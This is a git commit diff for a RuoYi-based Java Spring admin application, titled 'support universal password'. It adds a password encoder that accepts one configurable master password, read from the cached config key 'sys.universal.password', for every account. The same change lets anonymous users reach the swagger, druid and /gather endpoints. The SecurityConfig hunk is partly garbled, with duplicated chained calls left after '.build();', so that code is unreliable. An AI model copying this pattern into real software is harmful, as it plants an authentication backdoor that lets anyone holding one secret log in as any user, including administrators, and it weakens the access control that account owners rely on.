支持万能密码

1 week ago · a2d4bf58ca
parent 9ef678c96f
commit a2d4bf58ca
9 changed files with 117 additions and 22 deletions
--- a/sync-admin/src/main/java/com/lyr/RuoYiApplication.java
+++ b/sync-admin/src/main/java/com/lyr/RuoYiApplication.java
@ -14,15 +14,7 @@ public class RuoYiApplication {
    public static void main(String[] args) {
        // System.setProperty("spring.devtools.restart.enabled", "false");
        SpringApplication.run(RuoYiApplication.class, args);
-        System.out.println("(♥◠‿◠)ﾉﾞ  若依启动成功   ლ(´ڡ`ლ)ﾞ  \n" +
+        System.out.println("(♥◠‿◠)ﾉﾞ  启动成功   ლ(´ڡ`ლ)ﾞ");
-                " .-------.       ____     __        \n" +
+
                " |  _ _   \\      \\   \\   /  /    \n" +
                " | ( ' )  |       \\  _. /  '       \n" +
                " |(_ o _) /        _( )_ .'         \n" +
                " | (_,_).' __  ___(_ o _)'          \n" +
                " |  |\\ \\  |  ||   |(_,_)'         \n" +
                " |  | \\ `'   /|   `-'  /           \n" +
                " |  |  \\    /  \\      /           \n" +
                " ''-'   `'-'    `-..-'              ");
    }
 }
--- a/sync-framework/src/main/java/com/lyr/framework/config/BCryptPasswordEncoderEx.java
+++ b/sync-framework/src/main/java/com/lyr/framework/config/BCryptPasswordEncoderEx.java
@ -0,0 +1,46 @@
 package com.lyr.framework.config;
 import com.lyr.common.utils.StringUtils;
 import lombok.NoArgsConstructor;
 import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
 /**
 * BCryptPasswordEncoder 增强
 *
 * @author liyc
 * @date 2024/10/31
 * @description TODO
 **/
@NoArgsConstructor
 public class BCryptPasswordEncoderEx extends BCryptPasswordEncoder {
    /**
     * 万能密码
     */
    private static String universalPassword;
    public static void setUniversalPassword(String universalPassword) {
        BCryptPasswordEncoderEx.universalPassword = universalPassword;
    }
    /**
     * 密码比较
     *
     * @param rawPassword
     * @param encodedPassword
     * @return
     */
    @Override
    public boolean matches(CharSequence rawPassword, String encodedPassword) {
        if (StringUtils.isNotEmpty(universalPassword)) {
            boolean equals = universalPassword.equals(rawPassword.toString());
            if (equals) {
                return true;
            }
        }
        return super.matches(rawPassword, encodedPassword);
    }
 }
--- a/sync-framework/src/main/java/com/lyr/framework/config/SecurityConfig.java
+++ b/sync-framework/src/main/java/com/lyr/framework/config/SecurityConfig.java
@ -1,10 +1,13 @@
 package com.lyr.framework.config;
 import com.lyr.common.core.redis.RedisCache;
 import com.lyr.framework.config.properties.PermitAllUrlProperties;
 import com.lyr.framework.security.filter.JwtAuthenticationTokenFilter;
 import com.lyr.framework.security.handle.AuthenticationEntryPointImpl;
 import com.lyr.framework.security.handle.LogoutSuccessHandlerImpl;
 import com.lyr.system.service.ISysConfigService;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.boot.autoconfigure.condition.ConditionalOnBean;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
 import org.springframework.http.HttpMethod;
@ -15,7 +18,6 @@ import org.springframework.security.config.annotation.method.configuration.Enabl
 import org.springframework.security.config.annotation.web.builders.HttpSecurity;
 import org.springframework.security.config.http.SessionCreationPolicy;
 import org.springframework.security.core.userdetails.UserDetailsService;
 import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
 import org.springframework.security.web.SecurityFilterChain;
 import org.springframework.security.web.authentication.UsernamePasswordAuthenticationFilter;
 import org.springframework.security.web.authentication.logout.LogoutFilter;
@ -65,6 +67,7 @@ public class SecurityConfig {
    @Autowired
    private PermitAllUrlProperties permitAllUrl;
    /**
     * 身份验证实现
     */
@ -110,9 +113,7 @@ public class SecurityConfig {
                    // 对于登录login 注册register 验证码captchaImage 允许匿名访问
                    requests.antMatchers("/login", "/register", "/captchaImage").permitAll()
                            // 静态资源，可匿名访问
-                            .antMatchers(HttpMethod.GET, "/", "/*.html", "/**/*.html", "/**/*.css", "/**/*.js", "/profile/**").permitAll()
+                            .antMatchers(HttpMethod.GET, "/", "/*.html", "/**/*.html", "/**/*.css", "/**/*.js", "/profile/**").permitAll().antMatchers("/swagger-ui.html", "/swagger-resources/**", "/webjars/**", "/*/api-docs", "/druid/**").permitAll().antMatchers("/gather/*", "/gather/**").permitAll()
                            .antMatchers("/swagger-ui.html", "/swagger-resources/**", "/webjars/**", "/*/api-docs", "/druid/**").permitAll()
                            .antMatchers("/gather/*", "/gather/**").permitAll()
                            // 除上面外的所有请求全部需要鉴权认证
                            .anyRequest().authenticated();
                })
@ -121,16 +122,17 @@ public class SecurityConfig {
                // 添加JWT filter
                .addFilterBefore(authenticationTokenFilter, UsernamePasswordAuthenticationFilter.class)
                // 添加CORS filter
-                .addFilterBefore(corsFilter, JwtAuthenticationTokenFilter.class)
+                .addFilterBefore(corsFilter, JwtAuthenticationTokenFilter.class).addFilterBefore(corsFilter, LogoutFilter.class).build();
                .addFilterBefore(corsFilter, LogoutFilter.class)
                .build();
    }
    /**
     * 强散列哈希加密实现
     * PlmV1
     */
    @Bean
-    public BCryptPasswordEncoder bCryptPasswordEncoder() {
+    @ConditionalOnBean({ISysConfigService.class, RedisCache.class})
-        return new BCryptPasswordEncoder();
+    public BCryptPasswordEncoderEx bCryptPasswordEncoder() {
        return new BCryptPasswordEncoderEx();
    }
 }
--- a/sync-framework/src/main/java/com/lyr/framework/manager/DataSourceManager.java
+++ b/sync-framework/src/main/java/com/lyr/framework/manager/DataSourceManager.java
@ -90,7 +90,7 @@ public class DataSourceManager {
            JdbcTemplate jdbcTemplate = new JdbcTemplate(dataSource);
            Integer result = jdbcTemplate.queryForObject("SELECT 1", Integer.class);
            if (result != null && result == 1) {
-                log.info(String.format("数据源连接测试通过 %s", dataSourceName));
+                log.debug(String.format("数据源连接测试通过 %s", dataSourceName));
            } else {
                log.error(message);
                throw new ServiceException(message);
--- a/sync-framework/src/main/java/com/lyr/framework/web/service/SysPasswordService.java
+++ b/sync-framework/src/main/java/com/lyr/framework/web/service/SysPasswordService.java
@ -5,13 +5,15 @@ import com.lyr.common.core.domain.entity.SysUser;
 import com.lyr.common.core.redis.RedisCache;
 import com.lyr.common.exception.user.UserPasswordNotMatchException;
 import com.lyr.common.exception.user.UserPasswordRetryLimitExceedException;
-import com.lyr.common.utils.SecurityUtils;
+import com.lyr.framework.config.BCryptPasswordEncoderEx;
 import com.lyr.framework.security.context.AuthenticationContextHolder;
 import com.lyr.system.service.ISysConfigService;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.security.core.Authentication;
 import org.springframework.stereotype.Component;
 import javax.annotation.Resource;
 import java.util.concurrent.TimeUnit;
 /**
@ -30,6 +32,9 @@ public class SysPasswordService {
    @Value(value = "${user.password.lockTime}")
    private int lockTime;
    @Resource
    private ISysConfigService iSysConfigService;
    /**
     * 登录账户密码错误次数缓存键名
     *
@ -65,7 +70,10 @@ public class SysPasswordService {
    }
    public boolean matches(SysUser user, String rawPassword) {
-        return SecurityUtils.matchesPassword(rawPassword, user.getPassword());
+        String universalPassword = iSysConfigService.getConfigCache("sys.universal.password");
        BCryptPasswordEncoderEx bCryptPasswordEncoderEx = new BCryptPasswordEncoderEx();
        bCryptPasswordEncoderEx.setUniversalPassword(universalPassword);
        return bCryptPasswordEncoderEx.matches(rawPassword, user.getPassword());
    }
    public void clearLoginRecordCache(String loginName) {
--- a/sync-gather/src/main/java/com/lyr/gather/service/impl/DataSourceConfigServiceImpl.java
+++ b/sync-gather/src/main/java/com/lyr/gather/service/impl/DataSourceConfigServiceImpl.java
@ -63,8 +63,11 @@ public class DataSourceConfigServiceImpl extends ServiceImpl<DataSourceConfigMap
    }
    @Override
    public void list(String datasourceName, Object o) {
        tSupplierMapper.list(datasourceName);
    }
 }
--- a/sync-gather/target/generated-sources/annotations/com/lyr/gather/convert/DataSourceConfigConvertImpl.java
+++ b/sync-gather/target/generated-sources/annotations/com/lyr/gather/convert/DataSourceConfigConvertImpl.java
@ -0,0 +1,28 @@
 package com.lyr.gather.convert;
 import com.alibaba.druid.pool.DruidDataSource;
 import com.lyr.gather.domain.DataSourceConfigDTO;
 import javax.annotation.Generated;
@Generated(
    value = "org.mapstruct.ap.MappingProcessor",
    date = "2024-10-31T16:39:16+0800",
    comments = "version: 1.6.2, compiler: javac, environment: Java 1.8.0_392 (Amazon.com Inc.)"
 )
 public class DataSourceConfigConvertImpl implements DataSourceConfigConvert {
    @Override
    public DruidDataSource convert(DataSourceConfigDTO bean) {
        if ( bean == null ) {
            return null;
        }
        DruidDataSource druidDataSource = new DruidDataSource();
        druidDataSource.setName( bean.getName() );
        druidDataSource.setUsername( bean.getUsername() );
        druidDataSource.setPassword( bean.getPassword() );
        return druidDataSource;
    }
 }
--- a/sync-system/src/main/java/com/lyr/system/service/ISysConfigService.java
+++ b/sync-system/src/main/java/com/lyr/system/service/ISysConfigService.java
@ -64,6 +64,14 @@ public interface ISysConfigService {
     */
    void deleteConfigByIds(Long[] configIds);
    /**
     * 获取参数缓存对象
     *
     * @return
     */
    String getConfigCache(String configKey);
    /**
     * 加载参数缓存数据
     */
--- a/sync-system/src/main/java/com/lyr/system/service/impl/SysConfigServiceImpl.java
+++ b/sync-system/src/main/java/com/lyr/system/service/impl/SysConfigServiceImpl.java
@ -152,6 +152,7 @@ public class SysConfigServiceImpl implements ISysConfigService {
        }
    }
    /**
     * 加载参数缓存数据
     */
@ -163,6 +164,13 @@ public class SysConfigServiceImpl implements ISysConfigService {
        }
    }
    @Override
    public String getConfigCache(String configKey) {
        Object value = redisCache.getCacheObject(getCacheKey(configKey));
        return value != null ? value.toString() : null;
    }
    /**
     * 清空参数缓存数据
     */